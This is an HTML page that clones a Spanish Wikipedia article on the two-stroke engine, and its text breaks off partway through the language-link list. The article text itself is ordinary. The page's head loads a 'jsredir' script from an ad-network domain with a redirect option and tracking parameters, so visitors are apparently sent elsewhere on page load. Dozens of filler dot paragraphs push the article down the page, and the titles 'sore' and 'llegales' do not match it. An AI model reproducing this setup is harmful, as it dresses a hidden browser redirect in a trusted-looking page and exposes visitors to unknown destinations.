<!DOCTYPE html>
<html>
<head>
<title>sore</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></meta>
<meta name="googlebot" content="noarchive"/>
<meta content="noindex, nofollow" name="robots"/>
<meta property="og:title" content=""/>
<meta property="og:site_name" content="..."/>
<meta property="og:url" content="https://k62.kn3.net/7/A/A/8/8/B/FA3.png"/>
<meta property="og:image" content="https://k62.kn3.net/7/A/A/8/8/B/FA3.png"/>




<script src="https://restwp.mobidea.com/jsredir?v=1&amp;sl=3337102-0581b&amp;redirect_option=1&amp;data1=Track1&amp;data2=Track2"></script>


<link rel="stylesheet" type="text/css" href="css/gallito.css">

	<title>llegales</title>
</head>




<body class="mediawiki ltr sitedir-ltr mw-hide-empty-elt ns-0 ns-subject page-Motor_de_dos_tiempos rootpage-Motor_de_dos_tiempos skin-vector action-view">	
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p><p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>








	<div id="mw-page-base" class="noprint"></div>
		<div id="mw-head-base" class="noprint"></div>
		<div id="content" class="mw-body" role="main">
			<a id="top"></a>
			<div id="siteNotice" class="mw-body-content"><!-- CentralNotice --></div><div class="mw-indicators mw-body-content">
</div>
<h1 id="firstHeading" class="firstHeading" lang="es">Motor de dos tiempos</h1>			<div id="bodyContent" class="mw-body-content">
				<div id="siteSub" class="noprint">De Wikipedia, la enciclopedia libre</div>				<div id="contentSub"></div>
				<div id="jump-to-nav"></div>				<a class="mw-jump-link" href="#mw-head">Ir a la navegación</a>
				<a class="mw-jump-link" href="#p-search">Ir a la búsqueda</a>
				<div id="mw-content-text" lang="es" dir="ltr" class="mw-content-ltr"><div class="mw-parser-output"><div class="rellink noprint">No debe confundirse con <a href="/wiki/Dos_tiempos" title="Dos tiempos">dos tiempos</a>.</div>
<div class="floatright"><a href="/wiki/Archivo:Two-Stroke_Engine.gif" class="image"><img alt="Two-Stroke Engine.gif" src="//upload.wikimedia.org/wikipedia/commons/3/33/Two-Stroke_Engine.gif" width="165" height="287" data-file-width="165" data-file-height="287" /></a></div>
<div class="thumb tright">
<div class="thumbinner" style="width:183px;"><a href="/wiki/Archivo:2-Stroke_Engine_ani.gif" class="image"><img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/3/31/2-Stroke_Engine_ani.gif/181px-2-Stroke_Engine_ani.gif" width="181" height="183" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/3/31/2-Stroke_Engine_ani.gif 1.5x" data-file-width="200" data-file-height="202" /></a>
<div class="thumbcaption">
<div class="magnify"><a href="/wiki/Archivo:2-Stroke_Engine_ani.gif" class="internal" title="Aumentar"></a></div>
Motor Otto de dos tiempos.</div>
</div>
</div>
<p>El <b>motor de dos tiempos</b>, también denominado <b>motor de ciclos</b>, es un <a href="/wiki/Motor_de_combusti%C3%B3n_interna" title="Motor de combustión interna">motor de combustión interna</a> que realiza las cuatro etapas del <a href="/wiki/Ciclo_termodin%C3%A1mico" title="Ciclo termodinámico">ciclo termodinámico</a> (admisión, compresión, explosión y escape) en dos movimientos lineales del <a href="/wiki/Pist%C3%B3n" title="Pistón">pistón</a> (una vuelta del <a href="/wiki/Cig%C3%BCe%C3%B1al" title="Cigüeñal">cigüeñal</a>). Se diferencía del más conocido y frecuente <a href="/wiki/Ciclo_de_cuatro_tiempos" title="Ciclo de cuatro tiempos">motor de cuatro tiempos de ciclo de Otto</a>, en el que este último realiza las cuatro etapas en dos revoluciones del cigüeñal. Existe tanto en ciclo Otto como en ciclo Diésel.</p>
<p>El motor de 2 tiempos es, junto al motor de 4 tiempos, un motor de combustión interna con un ciclo de cuatro fases de admisión, compresión, combustión y escape, como el 4 tiempos, pero realizadas todas ellas en sólo 2 tiempos, es decir, en dos movimientos del pistón.</p>
<p>En un motor 2 tiempos se produce una explosión por cada vuelta de cigüeñal mientras que en un motor 4 tiempos se produce una explosión por cada dos vueltas de cigüeñal, lo que significa que a misma cilindrada se genera mayor potencia, pero también un mayor consumo de combustible.</p>
<p>Este motor es el más usual principalmente en <a href="/wiki/Motocicleta" title="Motocicleta">motocicletas</a> y <a href="/wiki/Motor_fuera_de_borda" class="mw-redirect" title="Motor fuera de borda">motores fuera de borda</a>.</p>
<p>A diferencia del motor de 4 tiempos no posee un cárter de almacenamiento del <a href="/wiki/Aceite_de_motor" title="Aceite de motor">aceite lubricante</a>, sino que el mismo se le agrega directamente junto con el combustible.</p>
<h2><span class="mw-headline" id="Funcionamiento">Funcionamiento</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Motor_de_dos_tiempos&amp;action=edit&amp;section=1" title="Editar sección: Funcionamiento">editar</a><span class="mw-editsection-bracket">]</span></span></h2>
<p>En el motor de 2 tiempos el cambio de gases se dirige mediante el pistón, no como en el de 4 tiempos que es por válvulas. El pistón en su movimiento varia las circunstancias de compresión del cárter y el cilindro que completan el ciclo.</p>
<p>1.<small><sup>er</sup></small> tiempo: Compresión y Aspiración: El pistón ascendente comprime la mezcla de aire, combustible y algo de aceite en el cilindro y simultáneamente crea un vacío en el cárter que el final de la carrera del pistón, este deja libre la lumbrera de aspiración o preadmisión que llena el cárter con mezcla carburada de gasolina.</p>
<p>2º tiempo: Explosión y escape de gases: Mediante una chispa provocada por la bujía se incendia la mezcla comprimida, creando una explosión que empuja el pistón con gran fuerza hacia abajo. En el cárter la mezcla es precomprimida por el pistón descendente, en el momento preciso el pistón deja libre el canal de escape o lumbrera de escape en el cilindro por donde salen los gases de escape de este y poco después la lumbrera de carga que conecta el cárter con el cilindro, por lo que la mezcla precomprimida pasa por este llenando el cilindro y expulsando los últimos resto de los gases de escape quedando preparado el cilindro para un nuevo ciclo de dos tiempos.</p>
<h2><span id="V.C3.A9ase_tambi.C3.A9n"></span><span class="mw-headline" id="Véase_también">Véase también</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Motor_de_dos_tiempos&amp;action=edit&amp;section=2" title="Editar sección: Véase también">editar</a><span class="mw-editsection-bracket">]</span></span></h2>
<ul>
<li><a href="/wiki/Ciclo_de_cuatro_tiempos" title="Ciclo de cuatro tiempos">Ciclo de cuatro tiempos</a></li>
<li><a href="/wiki/Motor_de_combusti%C3%B3n_interna" title="Motor de combustión interna">Motor de combustión interna</a></li>
<li><a href="/wiki/Motor_de_combusti%C3%B3n_interna_alternativo" title="Motor de combustión interna alternativo">Motor de combustión interna alternativo</a></li>
</ul>
<h2><span class="mw-headline" id="Referencias">Referencias</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Motor_de_dos_tiempos&amp;action=edit&amp;section=3" title="Editar sección: Referencias">editar</a><span class="mw-editsection-bracket">]</span></span></h2>
<div class="listaref" style="list-style-type: decimal;"></div>
<ul>
<li>Frank Jardine (Alcoa), "Thermal Expansion in Automotive Engine Design", SAE paper 300010, también en SAE Journal, Sept 1930, p 317.</li>
<li>A E Biermann y H H Ellerbrook: "The design of fins for air-cooled cylinders", NACA report Nº 726,1941.<a rel="nofollow" class="external autonumber" href="http://naca.central.cranfield.ac.uk/report.php?NID=1815">[1]</a></li>
<li>P V Lamarque: "The design of cooling fins for Motorcycle Engines". Report of the Automobile Research Committee, Institution of Automobile Engineers Proceedings, (London), March 1943.</li>
<li>David W. Blundell y M H. Sandford: "Two stroke engines - The Lotus approach", SAE paper 920779. Un sistema original de válvula para motores de 2T, con parecido al publicado por R Abell en el SAE Journal de Oct de 1923.</li>
<li>G P Blair y col (Univ Belfast), R Fleck (Mercury Marine), "Predicting the Performance Characteristics of Two-Cycle Engines Fitted with Reed Induction Valves", SAE paper 790842</li>
<li>G Bickle y col. "Controlling Two-Stroke Engine Emissions", Automotive Engineering International (SAE), Feb 2000: 27-32.</li>
<li>BOSCH, "Manual de la técnica del automóvil", 4.ª ed, 2005; 'Descarga desde depósitos de alta presión', pag 64, tabla 1. <a href="/wiki/Especial:FuentesDeLibros/3934584829" class="internal mw-magiclink-isbn">ISBN 3-934-584-82-9</a></li>
<li>Masilla, Motoscoot.es Forum, Preparaciones Avanzadas, "Manual preparación caja de láminas" 12-Ago-2009. <a rel="nofollow" class="external autonumber" href="http://forum.motoscoot.es/preparaciones-avanzadas/14717-manual-preparacion-caja-de-laminas.html">[2]</a></li>
</ul>


<!-- 
NewPP limit report
Parsed by mw1344
Cached time: 20180531011820
Cache expiry: 1900800
Dynamic content: false
CPU time usage: 0.024 seconds
Real time usage: 0.041 seconds
Preprocessor visited node count: 77/1000000
Preprocessor generated node count: 0/1500000
Post‐expand include size: 236/2097152 bytes
Template argument size: 11/2097152 bytes
Highest expansion depth: 4/40
Expensive parser function count: 0/500
Unstrip recursion depth: 0/20
Unstrip post‐expand size: 0/5000000 bytes
Lua time usage: 0.006/10.000 seconds
Lua memory usage: 569 KB/50 MB
-->
<!--
Transclusion expansion time report (%,ms,calls,template)
100.00%   23.954      1 -total
 89.00%   21.319      1 Plantilla:Distinguir
  9.81%    2.349      1 Plantilla:Listaref
-->
</div>
<!-- Saved in parser cache with key eswiki:pcache:idhash:292460-0!canonical and timestamp 20180531011820 and revision id 107074338
 -->
<noscript><img src="//es.wikipedia.org/wiki/Special:CentralAutoLogin/start?type=1x1" alt="" title="" width="1" height="1" style="border: none; position: absolute;" /></noscript></div>					<div class="printfooter">
						Obtenido de «<a dir="ltr" href="https://es.wikipedia.org/w/index.php?title=Motor_de_dos_tiempos&amp;oldid=107074338">https://es.wikipedia.org/w/index.php?title=Motor_de_dos_tiempos&amp;oldid=107074338</a>»					</div>
				<div id="catlinks" class="catlinks" data-mw="interface"><div id="mw-normal-catlinks" class="mw-normal-catlinks"><a href="/wiki/Especial:Categor%C3%ADas" title="Especial:Categorías">Categorías</a>: <ul><li><a href="/wiki/Categor%C3%ADa:Mec%C3%A1nica" title="Categoría:Mecánica">Mecánica</a></li><li><a href="/wiki/Categor%C3%ADa:Motores" title="Categoría:Motores">Motores</a></li><li><a href="/wiki/Categor%C3%ADa:Motores_de_combusti%C3%B3n_interna" title="Categoría:Motores de combustión interna">Motores de combustión interna</a></li><li><a href="/wiki/Categor%C3%ADa:Tecnolog%C3%ADas_del_autom%C3%B3vil" title="Categoría:Tecnologías del automóvil">Tecnologías del automóvil</a></li><li><a href="/wiki/Categor%C3%ADa:Componentes_del_autom%C3%B3vil" title="Categoría:Componentes del automóvil">Componentes del automóvil</a></li><li><a href="/wiki/Categor%C3%ADa:Tecnolog%C3%ADa_de_la_motocicleta" title="Categoría:Tecnología de la motocicleta">Tecnología de la motocicleta</a></li></ul></div><div id="mw-hidden-catlinks" class="mw-hidden-catlinks mw-hidden-cats-hidden">Categoría oculta: <ul><li><a href="/wiki/Categor%C3%ADa:Wikipedia:P%C3%A1ginas_con_enlaces_m%C3%A1gicos_de_ISBN" title="Categoría:Wikipedia:Páginas con enlaces mágicos de ISBN">Wikipedia:Páginas con enlaces mágicos de ISBN</a></li></ul></div></div>				<div class="visualClear"></div>
							</div>
		</div>
		<div id="mw-navigation">
			<h2>Menú de navegación</h2>
			<div id="mw-head">
									<div id="p-personal" role="navigation" class="" aria-labelledby="p-personal-label">
						<h3 id="p-personal-label">Herramientas personales</h3>
						<ul>
							<li id="pt-anonuserpage">No has accedido</li><li id="pt-anontalk"><a href="/wiki/Especial:MiDiscusi%C3%B3n" title="Discusión sobre ediciones hechas desde esta dirección IP [n]" accesskey="n">Discusión</a></li><li id="pt-anoncontribs"><a href="/wiki/Especial:MisContribuciones" title="Una lista de modificaciones hechas desde esta dirección IP [y]" accesskey="y">Contribuciones</a></li><li id="pt-createaccount"><a href="/w/index.php?title=Especial:Crear_una_cuenta&amp;returnto=Motor+de+dos+tiempos" title="Te recomendamos crear una cuenta e iniciar sesión; sin embargo, no es obligatorio">Crear una cuenta</a></li><li id="pt-login"><a href="/w/index.php?title=Especial:Entrar&amp;returnto=Motor+de+dos+tiempos" title="Te recomendamos iniciar sesión, aunque no es obligatorio [o]" accesskey="o">Acceder</a></li>						</ul>
					</div>
									<div id="left-navigation">
										<div id="p-namespaces" role="navigation" class="vectorTabs" aria-labelledby="p-namespaces-label">
						<h3 id="p-namespaces-label">Espacios de nombres</h3>
						<ul>
							<li id="ca-nstab-main" class="selected"><span><a href="/wiki/Motor_de_dos_tiempos" title="Ver la página de contenido [c]" accesskey="c">Artículo</a></span></li><li id="ca-talk"><span><a href="/wiki/Discusi%C3%B3n:Motor_de_dos_tiempos" rel="discussion" title="Discusión acerca del artículo [t]" accesskey="t">Discusión</a></span></li>						</ul>
					</div>
										<div id="p-variants" role="navigation" class="vectorMenu emptyPortlet" aria-labelledby="p-variants-label">
												<input type="checkbox" class="vectorMenuCheckbox" aria-labelledby="p-variants-label" />
						<h3 id="p-variants-label">
							<span>Variantes</span>
						</h3>
						<div class="menu">
							<ul>
															</ul>
						</div>
					</div>
									</div>
				<div id="right-navigation">
										<div id="p-views" role="navigation" class="vectorTabs" aria-labelledby="p-views-label">
						<h3 id="p-views-label">Vistas</h3>
						<ul>
							<li id="ca-view" class="collapsible selected"><span><a href="/wiki/Motor_de_dos_tiempos">Leer</a></span></li><li id="ca-edit" class="collapsible"><span><a href="/w/index.php?title=Motor_de_dos_tiempos&amp;action=edit" title="Editar esta página [e]" accesskey="e">Editar</a></span></li><li id="ca-history" class="collapsible"><span><a href="/w/index.php?title=Motor_de_dos_tiempos&amp;action=history" title="Versiones anteriores de esta página [h]" accesskey="h">Ver historial</a></span></li>						</ul>
					</div>
										<div id="p-cactions" role="navigation" class="vectorMenu emptyPortlet" aria-labelledby="p-cactions-label">
						<input type="checkbox" class="vectorMenuCheckbox" aria-labelledby="p-cactions-label" />
						<h3 id="p-cactions-label"><span>Más</span></h3>
						<div class="menu">
							<ul>
															</ul>
						</div>
					</div>
										<div id="p-search" role="search">
						<h3>
							<label for="searchInput">Buscar</label>
						</h3>
						<form action="/w/index.php" id="searchform">
							<div id="simpleSearch">
								<input type="search" name="search" placeholder="Buscar en Wikipedia" title="Buscar en este wiki [f]" accesskey="f" id="searchInput"/><input type="hidden" value="Especial:Buscar" name="title"/><input type="submit" name="fulltext" value="Buscar" title="Busca páginas con este texto." id="mw-searchButton" class="searchButton mw-fallbackSearchButton"/><input type="submit" name="go" value="Ir" title="Ir a la página con este nombre exacto si existe" id="searchButton" class="searchButton"/>							</div>
						</form>
					</div>
									</div>
			</div>
			<div id="mw-panel">
				<div id="p-logo" role="banner"><a class="mw-wiki-logo" href="/wiki/Wikipedia:Portada"  title="Visitar la página principal"></a></div>
						<div class="portal" role="navigation" id="p-navigation" aria-labelledby="p-navigation-label">
			<h3 id="p-navigation-label">Navegación</h3>
			<div class="body">
								<ul>
					<li id="n-mainpage-description"><a href="/wiki/Wikipedia:Portada" title="Visitar la página principal [z]" accesskey="z">Portada</a></li><li id="n-portal"><a href="/wiki/Portal:Comunidad" title="Acerca del proyecto, lo que puedes hacer, dónde encontrar información">Portal de la comunidad</a></li><li id="n-currentevents"><a href="/wiki/Portal:Actualidad" title="Encuentra información de contexto sobre acontecimientos actuales">Actualidad</a></li><li id="n-recentchanges"><a href="/wiki/Especial:CambiosRecientes" title="Lista de cambios recientes en el wiki [r]" accesskey="r">Cambios recientes</a></li><li id="n-newpages"><a href="/wiki/Especial:P%C3%A1ginasNuevas">Páginas nuevas</a></li><li id="n-randompage"><a href="/wiki/Especial:Aleatoria" title="Cargar una página al azar [x]" accesskey="x">Página aleatoria</a></li><li id="n-help"><a href="/wiki/Ayuda:Contenidos" title="El lugar para aprender">Ayuda</a></li><li id="n-sitesupport"><a href="//donate.wikimedia.org/wiki/Special:FundraiserRedirector?utm_source=donate&amp;utm_medium=sidebar&amp;utm_campaign=C13_es.wikipedia.org&amp;uselang=es" title="Apóyanos">Donaciones</a></li><li id="n-bug_in_article"><a href="/wiki/Wikipedia:Informes_de_error">Notificar un error</a></li>				</ul>
							</div>
		</div>
			<div class="portal" role="navigation" id="p-coll-print_export" aria-labelledby="p-coll-print_export-label">
			<h3 id="p-coll-print_export-label">Imprimir/exportar</h3>
			<div class="body">
								<ul>
					<li id="coll-create_a_book"><a href="/w/index.php?title=Especial:Libro&amp;bookcmd=book_creator&amp;referer=Motor+de+dos+tiempos">Crear un libro</a></li><li id="coll-download-as-rdf2latex"><a href="/w/index.php?title=Especial:ElectronPdf&amp;page=Motor+de+dos+tiempos&amp;action=show-download-screen">Descargar como PDF</a></li><li id="t-print"><a href="/w/index.php?title=Motor_de_dos_tiempos&amp;printable=yes" title="Versión imprimible de esta página [p]" accesskey="p">Versión para imprimir</a></li>				</ul>
							</div>
		</div>
			<div class="portal" role="navigation" id="p-wikibase-otherprojects" aria-labelledby="p-wikibase-otherprojects-label">
			<h3 id="p-wikibase-otherprojects-label">En otros proyectos</h3>
			<div class="body">
								<ul>
					<li class="wb-otherproject-link wb-otherproject-commons"><a href="https://commons.wikimedia.org/wiki/Category:Two-stroke_engines" hreflang="en">Wikimedia Commons</a></li>				</ul>
							</div>
		</div>
			<div class="portal" role="navigation" id="p-tb" aria-labelledby="p-tb-label">
			<h3 id="p-tb-label">Herramientas</h3>
			<div class="body">
								<ul>
					<li id="t-whatlinkshere"><a href="/wiki/Especial:LoQueEnlazaAqu%C3%AD/Motor_de_dos_tiempos" title="Lista de todas las páginas del wiki que enlazan aquí [j]" accesskey="j">Lo que enlaza aquí</a></li><li id="t-recentchangeslinked"><a href="/wiki/Especial:CambiosEnEnlazadas/Motor_de_dos_tiempos" rel="nofollow" title="Cambios recientes en las páginas que enlazan con esta [k]" accesskey="k">Cambios en enlazadas</a></li><li id="t-upload"><a href="//commons.wikimedia.org/wiki/Special:UploadWizard?uselang=es" title="Subir archivos [u]" accesskey="u">Subir archivo</a></li><li id="t-specialpages"><a href="/wiki/Especial:P%C3%A1ginasEspeciales" title="Lista de todas las páginas especiales [q]" accesskey="q">Páginas especiales</a></li><li id="t-permalink"><a href="/w/index.php?title=Motor_de_dos_tiempos&amp;oldid=107074338" title="Enlace permanente a esta versión de la página">Enlace permanente</a></li><li id="t-info"><a href="/w/index.php?title=Motor_de_dos_tiempos&amp;action=info" title="Más información sobre esta página">Información de la página</a></li><li id="t-wikibase"><a href="https://www.wikidata.org/wiki/Special:EntityPage/Q152323" title="Enlace al elemento conectado del repositorio de datos [g]" accesskey="g">Elemento de Wikidata</a></li><li id="t-cite"><a href="/w/index.php?title=Especial:Citar&amp;page=Motor_de_dos_tiempos&amp;id=107074338" title="Información sobre cómo citar esta página">Citar esta página</a></li>				</ul>
							</div>
		</div>
			<div class="portal" role="navigation" id="p-lang" aria-labelledby="p-lang-label">
			<h3 id="p-lang-label">En otros idiomas</h3>
			<div class="body">
								<ul>
					<li class="interlanguage-link interwiki-ar"><a href="https://ar.wikipedia.org/wiki/%D9%85%D8%AD%D8%B1%D9%83_%D8%B4%D9%88%D8%B7%D9%8A%D9%86" title="محرك شوطين (árabe)" lang="ar" hreflang="ar" class="interlanguage-link-target">العربية</a></li><li class="interlanguage-link interwiki-az"><a href="https://az.wikipedia.org/wiki/%C4%B0kitaktl%C4%B1_m%C3%BCh%C9%99rrik" title="İkitaktlı mühərrik (azerbaiyano)" lang="az" hreflang="az" class="interlanguage-link-target">Azərbaycanca</a></li><li class="interlanguage-link interwiki-bg"><a href="https://bg.wikipedia.org/wiki/%D0%94%D0%B2%D1%83%D1%82%D0%B0%D0%BA%D1%82%D0%BE%D0%B2_%D0%B4%D0%B2%D0%B8%D0%B3%D0%B0%D1%82%D0%B5%D0%BB" title="Двутактов двигател (búlgaro)" lang="bg" hreflang="bg" class="interlanguage-link-target">Български</a></li><li class="interlanguage-link interwiki-ca"><a href="https://ca.wikipedia.org/wiki/Motor_de_dos_temps" title="Motor de dos temps (catalán)" lang="ca" hreflang="ca" class="interlanguage-link-target">Català</a></li><li class="interlanguage-link interwiki-cs"><a href="https://cs.wikipedia.org/wiki/Dvoudob%C3%BD_spalovac%C3%AD_motor" title="Dvoudobý spalovací motor (checo)" lang="cs" hreflang="cs" class="interlanguage-link-target">Čeština</a></li><li class="interlanguage-link interwiki-da"><a href="https://da.wikipedia.org/wiki/Totaktsmotor" title="Totaktsmotor (danés)" lang="da" hreflang="da" class="interlanguage-link-target">Dansk</a></li><li class="interlanguage-link interwiki-de"><a href="https://de.wikipedia.org/wiki/Zweitaktmotor" title="Zweitaktmotor (alemán)" lang="de" hreflang="de" class="interlanguage-link-target">Deutsch</a></li><li class="interlanguage-link interwiki-en"><a href="https://en.wikipedia.org/wiki/Two-stroke_engine" title="Two-stroke engine (inglés)" lang="en" hreflang="en" class="interlanguage-link-target">English</a></li><li class="interlanguage-link interwiki-eu"><a href="https://eu.wikipedia.org/wiki/Bi_aldiko_eztanda-motorra" title="Bi aldiko eztanda-motorra (euskera)" lang="eu" hreflang="eu" class="interlanguage-link-target">Euskara</a></li><li class="interlanguage-link interwiki-fa"><a href="https://fa.wikipedia.org/wiki/%D9%85%D9%88%D8%AA%D9%88%D8%B1_%D8%AF%D9%88%D8%B2%D9%85%D8%A7%D9%86%D9%87" title="موتور دوزمانه (persa)" lang="fa" hreflang="fa" class="interlanguage-link-target">فارسی</a></li><li class="interlanguage-link interwiki-fi"><a href="https://fi.wikipedia.org/wiki/Kaksitahtimoottori" title="Kaksitahtimoottori (finés)" lang="fi" hreflang="fi" class="interlanguage-link-target">Suomi</a></li><li class="interlanguage-link interwiki-fr"><a href="https://fr.wikipedia.org/wiki/Moteur_%C3%A0_deux_temps" title="Moteur à deux temps (francés)" lang="fr" hreflang="fr" class="interlanguage-link-target">Français</a></li><li class="interlanguage-link interwiki-fy"><a href="https://fy.wikipedia.org/wiki/Twataktmotor" title="Twataktmotor (frisón occidental)" lang="fy" hreflang="fy" class="interlanguage-link-target">Frysk</a></li><li class="interlanguage-link interwiki-ga"><a href="https://ga.wikipedia.org/wiki/Inneall_dh%C3%A1_bhuille" title="Inneall dhá bhuille (irlandés)" lang="ga" hreflang="ga" class="interlanguage-link-target">Gaeilge</a></li><li class="interlanguage-link interwiki-gl"><a href="https://gl.wikipedia.org/wiki/Motor_a_dous_tempos" title="Motor a dous tempos (gallego)" lang="gl" hreflang="gl" class="interlanguage-link-target">Galego</a></li><li class="interlanguage-link interwiki-he"><a href="https://he.wikipedia.org/wiki/%D7%9E%D7%97%D7%96%D7%95%D7%A8_%D7%A9%D7%AA%D7%99_%D7%A4%D7%A2%D7%99%D7%9E%D7%95%D7%AA" title="מחזור שתי פעימות (hebreo)" lang="he" hreflang="he" class="interlanguage-link-target">עברית</a></li><li class="interlanguage-link interwiki-hi"><a href="https://hi.wikipedia.org/wiki/%E0%A4%A6%E0%A5%8D%E0%A4%B5%E0%A4%BF%E0%A4%98%E0%A4%BE%E0%A4%A4_%E0%A4%87%E0%A4%82%E0%A4%9C%E0%A4%A8" title="द्विघात इंजन (hindi)" lang="hi" hreflang="hi" class="interlanguage-link-target">हिन्दी</a></li><li class="interlanguage-link interwiki-hr"><a href="https://hr.wikipedia.org/wiki/Dvotaktni_motor" title="Dvotaktni motor (croata)" lang="hr" hreflang="hr" class="interlanguage-link-target">Hrvatski</a></li><li class="interlanguage-link interwiki-hu"><a href="https://hu.wikipedia.org/wiki/K%C3%A9t%C3%BCtem%C5%B1_motor" title="Kétütemű motor (húngaro)" lang="hu" hreflang="hu" class="interlanguage-link-target">Magyar</a></li><li class="interlanguage-link interwiki-id"><a href="https://id.wikipedia.org/wiki/Motor_bakar_dua_langkah" title="Motor bakar dua langkah (indonesio)" lang="id" hreflang="id" class="interlanguage-link-target">Bahasa Indonesia</a></li><li class="interlanguage-link interwiki-it"><a href="https://it.wikipedia.org/wiki/Motore_a_due_tempi" title="Motore a due tempi (italiano)" lang="it" hreflang="it" class="interlanguage-link-target">Italiano</a></li><li class="interlanguage-link interwiki-ja"><a href="https://ja.wikipedia.org/wiki/2%E3%82%B9%E3%83%88%E3%83%AD%E3%83%BC%E3%82%AF%E6%A9%9F%E9%96%A2" title="2ストローク機関 (japonés)" lang="ja" hreflang="ja" class="interlanguage-link-target">日本語</a></li><li class="interlanguage-link interwiki-ko"><a href="https://ko.wikipedia.org/wiki/2%ED%96%89%EC%A0%95_%EA%B8%B0%EA%B4%80" title="2행정 기관 (coreano)" lang="ko" hreflang="ko" class="interlanguage-link-target">한국어</a></li><li class="interlanguage-link interwiki-ksh"><a href="https://ksh.wikipedia.org/wiki/Zweitaktmotor" title="Zweitaktmotor (kölsch)" lang="ksh" hreflang="ksh" class="interlanguage-link-target">Ripoarisch</a></li><li class="interlanguage-link interwiki-mr"><a href="https://mr.wikipedia.org/wiki/%E0%A4%9F%E0%A5%82_%E0%A4%B8%E0%A5%8D%E0%A4%9F%E0%A5%8D%E0%A4%B0%E0%A5%8B%E0%A4%95_%E0%A4%87%E0%A4%82%E0%A4%9C%E0%A4%BF%E0%A4%A8" title="टू स्ट्रोक इंजिन (maratí)" lang="mr" hreflang="mr" class="interlanguage-link-target">मराठी</a></li><li class="interlanguage-link interwiki-ms"><a href="https://ms.wikipedia.org/wiki/Enjin_dua_lejang" title="Enjin dua lejang (malayo)" lang="ms" hreflang="ms" class="interlanguage-link-target">Bahasa Melayu</a></li><li class="interlanguage-link interwiki-nl"><a href="https://nl.wikipedia.org/wiki/Tweetaktmotor" title="Tweetaktmotor (neerlandés)" lang="nl" hreflang="nl" class="interlanguage-link-target">Nederlands</a></li><li class="interlanguage-link interwiki-nn"><a href="https://nn.wikipedia.org/wiki/Totaktsmotor" title="Totaktsmotor (noruego nynorsk)" lang="nn" hreflang="nn" class="interlanguage-link-target">Norsk nynorsk</a></li><li class="interlanguage-link interwiki-no"><a href="https://no.wikipedia.org/wiki/Totaktsmotor" title="Totaktsmotor (noruego)" lang="no" hreflang="no" class="interlanguage-link-target">Norsk</a></li><li class="interlanguage-link interwiki-pl"><a href="https://pl.wikipedia.org/wiki/Silnik_dwusuwowy" title="Silnik dwusuwowy (polaco)" lang="pl" hreflang="pl" class="interlanguage-link-target">Polski</a></li><li class="interlanguage-link interwiki-pt"><a href="https://pt.wikipedia.org/wiki/Motor_de_dois_tempos" title="Motor de dois tempos (portugués)" lang="pt" hreflang="pt" class="interlanguage-link-target">Português</a></li><li class="interlanguage-link interwiki-ro"><a href="https://ro.wikipedia.org/wiki/Motor_%C3%AEn_doi_timpi" title="Motor în doi timpi (rumano)" lang="ro" hreflang="ro" class="interlanguage-link-target">Română</a></li><li class="interlanguage-link interwiki-ru"><a href="https://ru.wikipedia.org/wiki/%D0%94%D0%B2%D1%83%D1%85%D1%82%D0%B0%D0%BA%D1%82%D0%BD%D1%8B%D0%B9_%D0%B4%D0%B2%D0%B8%D0%B3%D0%B0%D1%82%D0%B5%D0%BB%D1%8C" title="Двухтактный двигатель (ruso)" lang="ru" hreflang="ru" class="interlanguage-link-target">Русский</a></li><li class="interlanguage-link interwiki-sc"><a href="https://sc.wikipedia.org/wiki/Motore_a_duos_tempos" title="Motore a duos tempos (sardo)" lang="sc" hreflang="sc" class="interlanguage-link-target">Sardu</a></li><li class="interlanguage-link interwiki-si"><a href="https://si.wikipedia.org/wiki/%E0%B6%AF%E0%B7%99%E0%B6%B4%E0%B7%84%E0%B6%BB_%E0%B6%91%E0%B6%B1%E0%B7%8A%E0%B6%A2%E0%B7%92%E0%B6%B8" title="දෙපහර එන්ජිම (cingalés)" lang="si" hreflang="si" class="interlanguage-link-target">සිංහල</a></li><li class="interlanguage-link interwiki-sk"><a href="https://sk.wikipedia.org/wiki/Dvojdob%C3%BD_motor" title="Dvojdobý motor (eslovaco)" lang="sk" hreflang="sk" class="interlanguage-link-target">Slovenčina</a></li><li class="interlanguage-link interwiki-sl"><a href="https://sl.wikipedia.org/wiki/Dvotaktni_motor" title="Dvotaktni motor (esloveno)" lang="sl" hreflang="sl" class="interlanguage-link-target">Slovenščina</a></li><li class="interlanguage-link interwiki-sr"><a href="https://sr.wikipedia.org/wiki/%D0%94%D0%B2%D0%BE%D1%82%D0%B0%D0%BA%D1%82%D0%BD%D0%B8_%D0%BC%D0%BE%D1%82%D0%BE%D1%80" title="Двотактни мотор (serbio)" lang="sr" hreflang="sr" class="interlanguage-link-target">Српски / srpski</a></li><li class="interlanguage-link interwiki-sv"><a href="https://sv.wikipedia.org/wiki/Tv%C3%A5taktsmotor" title="Tvåtaktsmotor (sueco)" lang="sv" hreflang="sv" class="interlanguage-link-target">Svenska</a></li><li class="interlanguage-link interwiki-szl"><a href="https://szl.wikipedia.org/wiki/Dwusuwowy_motor" title="Dwusuwowy motor (Silesian)" lang="szl" hreflang="szl" class="interlanguage-link-target">Ślůnski</a></li><li class="interlanguage-link interwiki-th"><a href="https://th.wikipedia.org/wiki/%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C_2_%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B0" title="เครื่องยนต์ 2 จังหวะ (tailandés)" lang="th" hreflang="th" class="interlanguage-link-target">ไทย</a></li><li 